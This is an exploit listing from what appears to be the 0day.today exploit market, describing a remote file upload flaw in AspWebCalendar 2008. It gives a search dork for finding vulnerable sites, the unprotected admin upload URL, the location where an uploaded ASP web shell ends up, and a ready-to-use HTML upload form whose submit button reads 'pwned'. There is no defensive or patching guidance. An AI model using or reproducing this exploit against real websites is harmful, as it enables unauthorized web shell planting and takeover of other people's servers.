[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AspWebCalendar 2008 Remote File Upload Vulnerability

Author
Alemin_Krali
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3212
Category
web applications
Date add
17-06-2008
Platform
unsorted
====================================================
AspWebCalendar 2008 Remote File Upload Vulnerability
====================================================



# Discovered by : Alemin_Krali  

# Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell

http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>



#  0day.today [2024-11-16]  #